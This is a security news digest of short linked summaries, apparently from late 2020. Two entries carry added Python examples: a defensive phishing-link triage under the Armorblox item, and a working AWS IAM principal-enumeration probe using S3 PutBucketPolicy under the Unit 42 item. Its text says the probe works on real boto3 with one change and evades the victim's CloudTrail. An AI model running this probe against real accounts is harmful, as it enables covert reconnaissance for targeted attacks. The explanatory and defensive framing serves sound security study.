Inside the Cit0Day Breach Collection
www.troyhunt.com/inside-the-cit0day-breach-collection/ It’s increasingly hard to know what to do with data like that from Cit0Day. If that’s an unfamiliar name to you, start with Catalin Cimpanu’s story on the demise of the service followed by the subsequent leaking of the data. I was curious as to how much of this data had been seen in other breaches before and if there was an obvious trend. Only 55% of the addresses in the sample set had been seen before (after loading the complete data set into HIBP, that number rose to 65%). There were a bunch of addresses in the Collection #1 incident and also in the 2,844 breach collection I added in Feb 2018, but clearly based on the red “null” results there were also many new addresses.
[translation] RTL Nieuws entered a secret EU defense consultation meeting
www.rtlnieuws.nl/nieuws/buitenland/artikel/5198276/rtl-nieuws-hack-defensie-ministers-europa-overleg-bijleveld RTL News has gained access to a secret consultation between the European defense ministers. This was possible because the Twitter account of Minister Ank Bijleveld briefly contained a photo with the login address and part of the pin code.
Security Pros Push for More Pervasive Threat Modeling
www.darkreading.com/application-security/security-pros-push-for-more-pervasive-threat-modeling/d/d-id/1339506 On Nov. 17, Miller and 14 other security professionals published the “Threat Modeling Manifesto,” a document spelling out the general principles of how best to consider attack vectors on software. As a blueprint, the document uses the style and content of the “Agile Manifesto,” a statement published by 17 developers nearly two decades ago that set out simple and elegant goals for agile software developers. Manifesto at www.threatmodelingmanifesto.org/
YouTube, Facebook and Twitter align to fight Covid vaccine conspiracies
www.bbc.com/news/technology-55005385 Taking part in the effort alongside Facebook, Google-owned YouTube and Twitter are the UK’s Department for Digital, Culture, Media and Sport; the Reuters Institute for the Study of Journalism; Africa Check; Canada’s Privacy Council Office; and five other international fact-checking organisations.
Microsoft vows to pay users if it discloses their data following a government request that violates Europe’s privacy laws.
www.zdnet.com/article/microsoft-these-are-the-new-privacy-steps-were-taking-to-protect-your-data/ “Today, we’re announcing new protections for our public sector and enterprise customers who need to move their data from the European Union, including a contractual commitment to challenge government requests for data and a monetary commitment to show our conviction,” said [chief privacy officer] Brill.
How Cybercriminals Misuse and Abuse AI and ML
www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/exploiting-ai-how-cybercriminals-misuse-abuse-ai-and-ml We discuss the present state of the malicious uses and abuses of AI and ML and the plausible future scenarios in which cybercriminals might abuse these technologies for ill gain. Paper at
Robot Vacuums Suck Up Sensitive Audio in LidarPhone Hack
threatpost.com/robot-vacuums-audio-lidarphone-hack/161421/ We develop a system to repurpose the LiDAR sensor to sense acoustic signals in the environment, remotely harvest the data from the cloud and process the raw signal to extract information. We call this eavesdropping system LidarPhone, said the team of researchers from the University of Maryland, College Park and the National University of Singapore, in research published Wednesday. Paper at
German COVID-19 Contact-Tracing Vulnerability Allowed RCE
threatpost.com/german-covid-19-contact-tracing-vulnerability-rce/161419/ There appeared to be a pre-authentication RCE vulnerability in Corona-Warn-App Server, which drives Germany’s COVID-19 contact-tracing application infrastructure, according to Muñoz. This vulnerability had the potential to affect the integrity of Germany’s COVID-19 response and as such warranted an immediate response from our team.
US Senate approves deepfake bill to defend against manipulated media
www.theregister.com/2020/11/19/us_senate_deepfake/ On Wednesday, proposed US legislation to fund defenses against realistic computer-generated media known as deepfakes was approved by the US Senate and the bill now awaits consideration in the US House of Representatives.
OK Google, Build Me a Phishing Campaign
www.armorblox.com/blog/ok-google-build-me-a-phishing-campaign/ The Armorblox threat research team has seen a sharp uptick in attackers using Google services to help them get emails past binary security filters based on keywords or URLs. In this blog, we will outline five targeted phishing campaigns that weaponize various Google services during their attack flow.
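The reason these campaigns get through is that a link filter which decides on the hostname alone treats every page under a trusted brand as equally safe, while services such as Google Forms, Docs, Sites, Drive and Firebase Storage let anyone publish under that brand. The following triage logic is an added example (not Armorblox's detection code) that shows the difference: the naive filter and a content-aware one that escalates links to user-publishable locations for inspection. The allowlist, the list of user-content hosts and the sample e-mail are constructed for illustration; which exact services the five campaigns used is an assumption here.

```python
"""Domain allowlists vs. user-publishable content on a trusted domain.
Added example; constructed allowlist, host table and sample e-mail."""
import re
from urllib.parse import urlsplit

# Parent domains a naive "binary" URL filter trusts wholesale (constructed).
TRUSTED_DOMAINS = {"google.com", "googleapis.com"}

# Hosts and path prefixes where any account can publish content under the
# trusted brand.  Illustrative list; which services the campaigns abused is an
# assumption, not taken from the article.
USER_CONTENT = [
    ("docs.google.com", "/forms/"),
    ("docs.google.com", "/document/"),
    ("docs.google.com", "/presentation/"),
    ("drive.google.com", "/"),
    ("sites.google.com", "/"),
    ("firebasestorage.googleapis.com", "/"),
]

URL_RE = re.compile(r"""https?://[^\s<>"')\]]+""")


def extract_urls(text):
    """Pull http(s) links out of a plain-text message body."""
    return URL_RE.findall(text)


def _in_domain(host, domain):
    return host == domain or host.endswith("." + domain)


def naive_verdict(url):
    """Hostname-only decision: trusted parent domain => allow, else review."""
    host = (urlsplit(url).hostname or "").lower()
    return "allow" if any(_in_domain(host, d) for d in TRUSTED_DOMAINS) else "review"


def content_aware_verdict(url):
    """Same allowlist, but a link into a user-publishable location is escalated
    to 'inspect' (fetch and render the page, look for credential forms or
    redirects) instead of being waved through on the strength of the domain."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = parts.path or "/"
    for ugc_host, prefix in USER_CONTENT:
        if host == ugc_host and path.startswith(prefix):
            return "inspect"
    return naive_verdict(url)


def triage_email(body):
    """Map every link in the body to (naive verdict, content-aware verdict)."""
    return {u: (naive_verdict(u), content_aware_verdict(u)) for u in extract_urls(body)}


# Constructed sample; the form id is a placeholder, not a real campaign URL.
SAMPLE_EMAIL = """\
Your account has been suspended. Verify your details within 24 hours:
https://docs.google.com/forms/d/e/EXAMPLE-FORM-ID/viewform
Help: https://www.google.com/
"""

if __name__ == "__main__":
    for url, (naive, aware) in triage_email(SAMPLE_EMAIL).items():
        print(f"{url}\n  naive={naive}  content-aware={aware}")
```

The credential-harvesting form link gets "allow" from the hostname filter and "inspect" from the content-aware one; the brand's own homepage is allowed by both. The point generalises beyond Google: any SaaS host that serves customer-uploaded pages or files needs the same split between the operator's domain and the content it hosts.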
Convicted SIM Swapper Gets 3 Years in Jail
krebsonsecurity.com/2020/11/convicted-sim-swapper-gets-3-years-in-jail/ Conor Freeman of Dublin took part in the theft of more than two million dollars worth of cryptocurrency from different victims throughout 2018. Freeman was named as a member of a group of alleged SIM swappers called The Community charged last year with wire fraud in connection with SIM swapping attacks that netted in excess of $2.4 million.
[translation] F-Secure warns companies about a new scam: if you have turnover and money in the account, you are a potential extortion target
www.tivi.fi/uutiset/tv/7cc3c859-278f-413c-a3fd-ad1d21ecd43c It is also a good example of a method that makes it easy to fool the recipient. An email is sent that looks like a genuine Teams message, but its link actually leads to malware, warns [F-Secure CISO Jukka] Seppänen.
Microsoft really doesn’t want you to run web browsers with elevated privileges
www.windowslatest.com/2020/11/19/microsoft-doesnt-want-web-browsers-with-elevated-feature/ Microsoft will detect when the browser is running elevated in a scenario where executables can be run un-elevated. When detected, Microsoft wants to re-launch the browser through explorer.exe so the browser will run under the same user as the shell and de-elevation will take place.
Facebook offers up first-ever estimate of hate speech prevalence on its platform
www.reuters.com/article/us-facebook-content/facebook-estimates-hate-speech-seen-in-1-out-of-1000-views-on-its-platform-idUSKBN27Z2R0 Facebook Inc for the first time on Thursday disclosed numbers on the prevalence of hate speech on its platform, saying that out of every 10,000 content views in the third quarter, 10 to 11 included hate speech.
Information Leakage in AWS Resource-Based Policy APIs
unit42.paloaltonetworks.com/aws-resource-based-policy-apis/ Unit 42 researchers discovered a class of Amazon Web Services (AWS) APIs that can be abused to leak the AWS Identity and Access Management (IAM) users and roles in arbitrary accounts. Researchers confirmed that 22 APIs across 16 different AWS services could be abused the same way and the exploit works across all three AWS partitions (aws, aws-us-gov and aws-cn). AWS services that can potentially be abused by attackers include Amazon Simple Storage Service (S3), Amazon Key Management Service (KMS) and Amazon Simple Queue Service (SQS). A malicious actor may obtain the roster of an account, learn the organization’s internal structure and launch targeted attacks against individuals.
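The leak works because these APIs validate every principal named in a submitted resource-based policy before accepting it: S3 PutBucketPolicy, for instance, fails with MalformedPolicy ("Invalid principal in policy") when an ARN does not resolve and succeeds when it does, regardless of which account owns the principal, and the call is logged only in the caller's own account. The probe below is an added example, not Unit 42's tooling. It runs offline against a constructed stand-in for the boto3 S3 client that mimics that validation; with real boto3 the only changes are `s3 = boto3.client("s3")` and a bucket the caller owns with s3:PutBucketPolicy on it. The target account ID, bucket name and candidate names are made up.

```python
"""Probe for IAM principals in another AWS account via S3 PutBucketPolicy
validation.  Added example, not Unit 42's code; target details are constructed."""
import json

try:
    from botocore.exceptions import ClientError  # real boto3 error type
except ImportError:  # lets the example run where boto3 is not installed
    class ClientError(Exception):
        def __init__(self, error_response, operation_name):
            super().__init__(error_response["Error"]["Message"])
            self.response = error_response
            self.operation_name = operation_name


def probe_policy(principal_arn, bucket):
    """A harmless policy whose only purpose is to make S3 resolve principal_arn.
    Deny on a non-existent object grants nothing if it ever sticks."""
    return json.dumps({
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "ProbeOnly",
            "Effect": "Deny",
            "Principal": {"AWS": principal_arn},
            "Action": "s3:GetObject",
            "Resource": f"arn:aws:s3:::{bucket}/nonexistent-probe-object",
        }],
    })


def principal_exists(s3, bucket, principal_arn):
    """True if S3 accepted the policy (the ARN resolves), False on MalformedPolicy.
    Any other error (AccessDenied, NoSuchBucket, throttling) is re-raised so it is
    never mistaken for 'principal does not exist'."""
    try:
        s3.put_bucket_policy(Bucket=bucket, Policy=probe_policy(principal_arn, bucket))
    except ClientError as e:
        if e.response["Error"]["Code"] == "MalformedPolicy":
            return False
        raise
    # Remove the probe policy so the Deny never lingers on the caller's bucket.
    s3.delete_bucket_policy(Bucket=bucket)
    return True


def enumerate_principals(s3, bucket, account_id, candidate_names):
    """Try each candidate as both a role and a user in account_id; return hits."""
    found = []
    for name in candidate_names:
        for kind in ("role", "user"):
            arn = f"arn:aws:iam::{account_id}:{kind}/{name}"
            if principal_exists(s3, bucket, arn):
                found.append(arn)
    return found


class FakeS3Client:
    """Constructed stand-in for boto3's S3 client so the example runs offline.
    Mirrors the live behaviour: ARNs in `existing` are accepted, any other
    principal is rejected with MalformedPolicy."""
    def __init__(self, existing):
        self.existing = set(existing)
        self.calls = 0

    def put_bucket_policy(self, Bucket, Policy):
        self.calls += 1
        principal = json.loads(Policy)["Statement"][0]["Principal"]["AWS"]
        if principal not in self.existing:
            raise ClientError(
                {"Error": {"Code": "MalformedPolicy",
                           "Message": "Invalid principal in policy"}},
                "PutBucketPolicy")
        return {}

    def delete_bucket_policy(self, Bucket):
        return {}


if __name__ == "__main__":
    # Constructed target account with one guessable role and one guessable user.
    fake = FakeS3Client({
        "arn:aws:iam::123456789012:role/OrganizationAccountAccessRole",
        "arn:aws:iam::123456789012:user/admin",
    })
    print(enumerate_principals(fake, "attacker-owned-bucket", "123456789012",
                               ["admin", "OrganizationAccountAccessRole", "deploy"]))
```

Two things a practitioner should take from this: the victim account sees nothing in its own CloudTrail, because every call targets a bucket in the attacker's account, so detection has to happen on the attacker's side or not at all; and the probe also confirms that an account ID is live (`arn:aws:iam::<id>:root`), which is why predictable identity names and stale users and roles are worth cleaning up.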